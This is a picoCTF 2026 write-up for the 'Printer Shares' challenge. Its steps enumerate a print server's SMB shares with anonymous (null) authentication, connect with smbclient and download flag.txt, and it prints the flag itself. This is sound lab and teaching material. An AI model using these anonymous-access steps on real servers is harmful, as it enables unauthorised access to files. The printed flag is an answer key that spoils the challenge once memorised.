picoCTF Solutions
picoCTF 2026General SkillsMedium

Printer Shares

Published: March 20, 2026

Description

Oops! Someone accidentally sent an important file to a network printer -- can you retrieve it from the print server?

Setup

Launch the challenge instance and note the host and port.

Install smbclient if not already available: sudo apt install smbclient

sudo apt install smbclient

Solution

  1. Step 1Verify connectivity and enumerate SMB shares
    Confirm the SMB service is reachable and list available shares. The -N flag enables null (anonymous) authentication -- no username or password needed.
    nc -vz <HOST> <PORT_FROM_INSTANCE>
    smbclient -L //<HOST> -p <PORT_FROM_INSTANCE> -N
  2. Step 2Connect to the 'shares' share
    Connect anonymously to the share named 'shares' that appeared in the listing.
    smbclient //<HOST>/shares -p <PORT_FROM_INSTANCE> -N
  3. Step 3Download and read the flag file
    List the files in the share and download flag.txt.
    smb: \> ls
    smb: \> get flag.txt
    smb: \> exit
    cat flag.txt

Flag

picoCTF{5mb_pr1nter_5h4re5_7a400ec3}

The print server exposes an SMB share with no authentication required. Anonymous access via smbclient -N reveals flag.txt directly in the 'shares' share.